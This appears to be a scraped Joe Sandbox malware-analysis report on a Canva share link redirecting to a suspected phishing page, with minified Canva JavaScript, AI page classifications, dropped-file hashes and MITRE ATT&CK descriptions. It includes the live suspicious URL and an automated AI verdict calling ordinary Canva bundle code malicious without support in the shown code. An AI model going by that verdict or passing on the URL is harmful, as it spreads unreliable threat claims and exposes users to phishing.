(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] \|\| []).push([[1389],{ /**/ 813110: function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;self._fe4d99ebe0d2d259646a80d250150d47 = self._fe4d99ebe0d2d259646a80d250150d47 \|\| {};(function(__c) {/ Copyright The Closure Library Authors. SPDX-License-Identifier: Apache-2.0 */ var Xp;var F;var Y;var La;var db;var Ma;var dl;var X;var x;var Bc;var Yb;var fl;var G;var eb;var jk;var Th;var Wg;var Qg;var J;var Pg;var Ee;var xe;var Zd;var lb;var fa;var u;var l; var aa,da,ea,ka,ia,ra,qa,na,ma,xa,Aa,Ba,Ea,Fa,Ga,Ka,Oa,Qa,$a,Ya,Ua,Va,Wa,Xa,Za,cb,Ha,Ta,Ra,Sa,fb,hb,jb,kb,mb,ub,ob,yb,Ab,Eb,Fb,Hb,xb,Jb,Ib,Kb,Lb,Mb,Nb,Rb,Wb,Zb,bc,ac,cc,dc,hc,gc,jc,kc,rc,oc,Ec,yc,Fc,tc,Kc,Lc,Mc,Nc,Pc,Vc,Yc,$c,ad,bd,jd,fd,dd,cd,kd,ld,qd,ud,td,vd,rd,yd,zd,Ad,Cd,Ed,Gd,Hd,Id,Jd,Kd,Ld,Md,Od,Nd,Qd,Td,Sd,Vd,Ud,Xd,Yd,ae,ce,ne,be,oe,qe,re,ue,ve,Ae,ze,ye,De,Fe,Ge,He,Ie,Le,Ne,Oe,Pe,Me,Qe,Se,Te,Ve,Ye,Ze,$e,af,bf,ef,ff,cf,df,hf,jf,kf,lf,mf,Xe,qf,pf,vf,wf,yf,zf,xf,Bf,Af,Mf,$f,ag,bg,fg,hg,ig,jg, kg,ng,og,rg,qg,Ag,sg,Dg,Eg,Fg,Gg,Lg,Hg,Mg,Ig,Ng,Rg,Ug,Vg,Xg,Yg,Zg,ah,ch,dh,gh,jh,kh,nh,lh,qh,sh,uh,wh,xh,zh,Q,Ch,Eh,Dh,Fh,Kh,Hh,Oh,Ph,Rh,Qh,Sh,hi,gi,Wh,Uh,Vh,ci,ki,ni,mi,li,ui,vi,oi,xi,wi,Di,Ei,Fi,Gi,Hi,Ii,Ji,Oi,Pi,Ti,Ui,Wi,Yi,Xi,Zi,aj,cj,dj,ej,fj,gj,hj,ij,jj,kj,mj,lj,nj,qj,sj,rj,uj,vj,wj,Aj,Bj,Cj,Dj,Fj,Gj,Hj,Mj,Nj,Pj,ak,Rj,Uj,Xj,bk,fk,hk,kk,lk,nk,pk,tk,rk,ca,ba; aa=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");};da=function(a,b){if(b)a:{var c=ba;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&ca(c,a,{configurable:!0,writable:!0,value:b})}}; l=__c.l=function(a,b,...c){if(!a)throw Error(null==b?"invalid argument":ea(b,...c));};ea=function(a,...b){let c=0;return a.replace(/\{}/g,()=>c<b.length?b[c++]:"{}")};fa=__c.fa=function(a,b){var c=[];if(null==a)throw Error(null==b?"argument is null":ea(b,...c));return a};ka=function(a,b,c){const d=c&&c.gf;c=c&&c.Qk;if(!(a in ha)){const e=self.bootstrap;if(!e)throw Error("Could not find bootstrap");ha[a]={...e[a]};c\|\|delete e[a]}return ia(a,b,d&&a in ja?ja[a]:void 0)}; ia=function(a,b,c){if(a in la&&null==c&&null!=la[a])return la[a];null!=c&&0<c.size&&c.forEach((d,e)=>{a:{e=e.split(".");let f=ha[a],g=e.shift();for(;e.length;){if(ma(g,f)){d=void 0;break a}g in f\|\|(f[g]=String(Number(e[0]))===e[0]?[]:{});f=f[g];g=e.shift()}ma(g,f)\|\|(f[g]=na(d,f[g]));d=void 0}return d});b=b(pa.required(a,ha));la[a]=null==c?b:void 0;return b};ra=function(){var a=window.location.search;const b={};["base","page","ui"].forEach(c=>{const d=qa(a,`bootstrap.${c}.`);0<d.size&&(b[c]=d)});return b}; qa=function(a,b){const c=new Map;(new URLSearchParams(a)).forEach((d,e)=>{e.startsWith(b)&&c.set(decodeURIComponent(e.replace(b,"").replace(/\+/g," ")),decodeURIComponent(d.replace(/\+/g," ")))});return c}; na=function(a,b){b=typeof b;switch(b){case "undefined":if(""===a)return!0;b=sa.exec(a);return null!=b?b[1]:ua.has(a)?ua.get(a):""!==a.trim()&&Number.isFinite(Number(a))?Number(a):va.has(a)?va.get(a):a;case "boolean":return l(ua.has(a),"boolean value expected: {}",a),ua.get(a);case "number":return l(""!==a.trim()&&Number.isFinite(Number(a)),"finite numeral expected: {}",a),Number(a);case "object":return l(va.has(a),"object value expected: {}",a),va.get(a);case "string":return b=sa.exec(a),null!=b? b[1]:a;case "function":case "bigint":case "symbol":throw Error(`unexpected hint type: ${b}`);default:throw new u(b);}};ma=function(a,b){return Object.getPrototypeOf(b)===b[a]\|\|!b.hasOwnProperty(a)&&a in Object.getPrototypeOf(b)?!0:!1};xa=function(a){return new wa(a)};Aa=function(a){return new za(a)};Ba=function(a){return null!=a&&null!=a.then}; Ea=function(a){var {Fj:b
URL: https://static.canva.com/web/71f6dba82cb18a30.js... Model: Joe Sandbox AI	{ "risk_score": 7, "reasoning": "This JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of `__webpack_require__` to execute remote code and the creation of a global object `self._fe4d99ebe0d2d259646a80d250150d47` are particularly concerning. Additionally, the script appears to be interacting with IndexedDB, which could be used for data storage and exfiltration. Overall, the combination of these behaviors suggests this script is likely malicious and should be further investigated." }
(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] \|\| []).push([[7689],{ /***/ 46468: function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);self._fe4d99ebe0d2d259646a80d250150d47 = self._fe4d99ebe0d2d259646a80d250150d47 \|\| {};(function(__c) {var Da=__c.Da; var rq=function(a){return a instanceof Error?"QuotaExceededError"===a.name\|\|a instanceof DOMException&&22===a.code\|\|a instanceof qq:!1},sq=function(a){const b=Error(a);return c=>{c instanceof Error&&(null==c.stack\|\|""===c.stack)&&(c.stack=b.stack);return c}},tq=function(a){return new Promise((b,c)=>{const d=()=>{a.removeEventListener("success",e);a.removeEventListener("error",g)},e=()=>{d();b(a.result)},f=sq("idb promisify_request_events error"),g=()=>{d();c(f(a.error))};a.addEventListener("success",e); a.addEventListener("error",g)})},uq=async function(a,b){const c=a.J(a.cursor.request);a.cursor.continue(b);return c},wq=function(a){return new Promise((b,c)=>{const d=sq("idb_transaction error");a.xa.addEventListener("complete",()=>b());a.xa.addEventListener("error",f=>{f=f.target;c(d((null===f\|\|void 0===f?void 0:f.error)\|\|a.xa.error\|\|Error("Unknown error")))});const e=new vq;a.xa.addEventListener("abort",()=>{if(a.xa.error instanceof Error){var f=e.cause=a.xa.error;f=[`${f.name}`,`${f.message}`].filter(g=> !!g).join(": ");e.message=`${e.message} (${f})`}c(e)})})},zq=function(a,b){a instanceof Error?rq(b)\|\|rq(a)?a=new qq(a):(self.indexedDB?a instanceof Error?(null!==xq&&void 0!==xq?xq:xq=new Set(["Internal error opening backing store for indexedDB.open.","Internal error."]),b=xq.has(a.message)\|\|a instanceof yq):b=!1:b=!0,a=b?new yq(a):a):a=Error(String(a));return a},Cq=async function(a,b){null!=a.qb&&(self.clearTimeout(a.qb),a.qb=void 0);if(null==a.Oa\|\|a.Oa.Zf)a.Oa=new Aq(a.va,a.Vf,a.zg);let c=0;try{let d; for(;3>c++;)if(d=await a.Oa.db,null==a.Oa\|\|a.Oa.Zf\|\|null==d)a.Oa=new Aq(a.va,a.Vf,a.zg);else return d.ok?await b(d.value):d}finally{Bq(a)}return Da(new yq(Error(`Failed to reconnect to indexed_db after ${c+1} attempts`)))},Dq=async function(a,b,c,d){a=await Cq(a,async e=>{try{let f;try{f=e.transaction(b,c)}catch(m){return Da(zq(m,null))}let g;try{g=d(f.objectStore(b)).then(m=>(0,__c.Ca)(m)).catch(m=>{try{f.abort()}catch(n){}return Da(zq(m,f.error))})}catch(m){try{f.abort()}catch(n){}g=Promise.resolve(Da(zq(m, f.error)))}const h=await f.Bc.then(()=>(0,__c.Ca)()).catch(m=>Da(zq(m,f.error))),k=await g;return k.ok?h.ok?k:h:k}catch(f){return Da(zq(f))}});if(a.ok)return a.value;throw a.error;},Bq=function(a){null!=a.qb&&self.clearTimeout(a.qb);switch(a.Sf){case null:break;default:a.qb=self.setTimeout(()=>{a.qb=void 0;a.close()},a.Sf)}},Eq=function(a,b){return{key:a,record:b}},qq=class extends Error{constructor(a){super("Quota exceeded");this.cause=a}},yq=class extends Error{constructor(a){super("Indexed db unavailable"); this.cause=a}},xq,Fq=class extends Error{constructor(){super("Maximum number of rows exceeded for put request")}},Gq=class extends Error{constructor(a){super("Failed to deserialize stored data");this.cause=a}};var Hq=class{async continue(a){a=await uq(this,a);if(null!=a)return new Hq(a)}async update(a){a=this.cursor.update(a);return this.J(a)}async delete(){const a=this.cursor.delete();return this.J(a)}constructor(a){this.cursor=a;this.J=tq}},Iq=class extends Hq{async continue(a){a=await uq(this,a);if(null!=a)return new Iq(a)}get value(){return this.cursor.value}constructor(a){super(a);this.cursor=a}};var Jq=class{async get(a){a=this.index.get(a);return this.J(a)}async getAll(a,b){a=this.index.getAll(a,b);return this.J(a)}async getAllKeys(a,b){a=this.index.getAllKeys(a,b);return this.J(a)}async count(a){a=this.index.count(a);return this.J(a)}async openCursor(a,b){a=this.index.openCursor(a,b);a=await this.J(a);return null!=a?new Iq(a):void 0}async openKeyCursor(a,b){a=this.index.openKeyCursor(a,b);a=await this.J(a);return null!=a?new Hq(a):void 0}constructor(a){t
URL: https://gu3.watetiona.com/YEcft/ Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Conducting verification on your browser for secure access.", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_security_alerts": true }

URL: https://gu3.watetiona.com/YEcft/ Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Conducting verification on your browser for secure access.", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_security_alerts": true }

URL: https://gu3.watetiona.com/YEcft/ Model: Joe Sandbox AI	{ "brands": "unknown" }

URL: https://gu3.watetiona.com Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": true }
URL: https://gu3.watetiona.com
URL: https://gu3.watetiona.com/YEcft/ Model: Joe Sandbox AI	{ "brands": [ "Cloudflare" ] }

URL: https://www.microsoft.com/en-us/power-platform/products/power-bi/ Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "Get started", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_security_alerts": false }

URL: https://www.microsoft.com/en-us/power-platform/products/power-bi/ Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }

URL: https://www.microsoft.com Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": true, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: https://www.microsoft.com
URL: https://www.microsoft.com/en-us/power-platform/products/power-bi/ Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "Get started", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_security_alerts": false }

URL: https://www.microsoft.com/en-us/power-platform/products/power-bi/ Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }

URL: https://www.microsoft.com/en-us/power-platform/products/power-bi/ Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "Get started", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_security_alerts": false }

URL: https://www.microsoft.com/en-us/power-platform/products/power-bi/ Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }

URL: https://www.microsoft.com/en-us/power-platform/products/power-bi/ Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "Get started", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_security_alerts": false }

URL: https://www.microsoft.com/en-us/power-platform/products/power-bi/ Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Dec 13 21:15:29 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2673
Entropy (8bit):	3.98950082951538
Encrypted:	false
SSDEEP:
MD5:	D2593C8A627BE4F10E00A9F17A9ECF97
SHA1:	34418B0BC4CCB36DA8244744C0A9DD77AE9EE4EA
SHA-256:	924C700F08EA583CFC8409BD942070B291B86E62AABCBD5AD14A3B7D62C3C5FF
SHA-512:	15FB3A51B9FEDCE244F22BA0F335EA2B91500EA053E3E2098ABA030D5DB2A9104A1248F59AEC53B1612A32960F04BF4D250F77EF9BD8597CD194028D13EF47B3
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.........M..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............V.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://www.canva.com/link?target=https%3A%2F%2Fgu3.watetiona.com%2FYEcft%2F&design=DAGZLjls8N8&accessRole=viewer&linkSource=document

Overview

General Information

Detection

Signatures

Classification

Process Tree

Yara Signatures

Dropped Files

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

Phishing

Compliance

Networking

System Summary

Boot Survival

Mitre Att&ck Matrix

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

LLM Input / Output

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Chrome Cache Entry: 231

Chrome Cache Entry: 232

Chrome Cache Entry: 233

Chrome Cache Entry: 234

Chrome Cache Entry: 236

Chrome Cache Entry: 237

Chrome Cache Entry: 238

Chrome Cache Entry: 239

Chrome Cache Entry: 240

Chrome Cache Entry: 241

Chrome Cache Entry: 242

Chrome Cache Entry: 247

Chrome Cache Entry: 256

Chrome Cache Entry: 257

Chrome Cache Entry: 259

Chrome Cache Entry: 260

Chrome Cache Entry: 263

Chrome Cache Entry: 264

Chrome Cache Entry: 266

Chrome Cache Entry: 267

Chrome Cache Entry: 268

Chrome Cache Entry: 269

Chrome Cache Entry: 270

Chrome Cache Entry: 271

Chrome Cache Entry: 273

Chrome Cache Entry: 277

Chrome Cache Entry: 278

Chrome Cache Entry: 279

Chrome Cache Entry: 280

Chrome Cache Entry: 284

Chrome Cache Entry: 286

Windows Analysis Report
https://www.canva.com/link?target=https%3A%2F%2Fgu3.watetiona.com%2FYEcft%2F&design=DAGZLjls8N8&accessRole=viewer&linkSource=document